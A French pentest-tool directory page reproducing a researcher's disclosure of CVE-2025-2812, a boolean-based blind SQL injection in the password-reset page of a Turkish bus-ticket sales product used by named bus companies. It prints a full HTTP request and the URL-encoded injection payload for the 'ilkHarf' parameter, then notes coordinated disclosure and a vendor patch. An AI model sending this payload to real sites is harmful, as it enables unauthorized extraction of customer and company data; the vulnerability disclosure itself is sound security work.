Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-2812 — CVE-2025-2812 Injection SQL | Kitploit
Outils/GitHubGitHub/sahici/cve-2025-2812
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubsahici/cve-2025-2812

CVE-2025-2812

CVE-2025-2812 Injection SQL

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2025-2812 — Vulnérabilité d'injection SQL dans "Bilet Satış Otomasyonu" de Mydata Bilişim Ltd. Şti

📌 CVE-ID : CVE-2025-2812
📢 Avis USOM : tr-25-0099
🛡️ Type de vulnérabilité : CWE-89 - Injection SQL (aveugle basée sur booléen)
🏢 Produit concerné : Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 Exemple d'URL cible : https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php


🔍 Résumé de la vulnérabilité

Une vulnérabilité d'injection SQL aveugle basée sur booléen (Boolean-based Blind SQL Injection) a été détectée dans le paramètre "Adınızın ilk harfi" (ilkHarf) de la page de réinitialisation de mot de passe (SifremiUnuttum.php) du produit "Bilet Satış Otomasyonu". Cette vulnérabilité permet d'extraire des données du système sans nom d'utilisateur ni mot de passe.

Cette vulnérabilité concerne les systèmes des compagnies de bus suivantes :

  • Balıkesir Uludağ
  • Kontur
  • Efe Tur
  • Kale Seyahat
  • +20 sociétés

💥 PoC (Proof of Concept)

📌 Requête HTTP :

root@kitploit:~
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************

🧪 Charge utile utilisée :

root@kitploit:~
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW

🧠 Détails techniques

  • Paramètre vulnérable : ilkHarf
  • Méthode : SQLi aveugle basée sur booléen
  • Type de vulnérabilité : Neutralisation incorrecte des éléments spéciaux utilisés dans une commande SQL ('Injection SQL')

🙏 Remerciements

Suite à la vulnérabilité que nous avons détectée dans le produit "Bilet Satış Otomasyonu" développé par "Mydata Bilişim Ltd. Şti", cette faille, annoncée sous le code CVE-2025-2812, a été divulguée en coordination avec le fabricant et USOM. Nous sommes fiers de contribuer à la communauté de la cybersécurité dans ce processus.

Après la notification de la vulnérabilité, Mydata Bilişim Ltd. Şti a rapidement mis en œuvre toutes les procédures nécessaires, a corrigé la faille de sécurité concernée et a intégré des mesures de sécurité supplémentaires à ses systèmes. Nous les remercions pour leur transparence, leur coopération et leur sens des responsabilités tout au long du processus.

Nous sommes fiers de contribuer à la communauté de la cybersécurité dans ce processus.


📬 Contact

Pour toute question, commentaire ou collaboration, vous pouvez me contacter :

  • 📧 E-mail : [email protected]
  • 📷 Instagram : @yyasar.yasin

Télécharger l’outil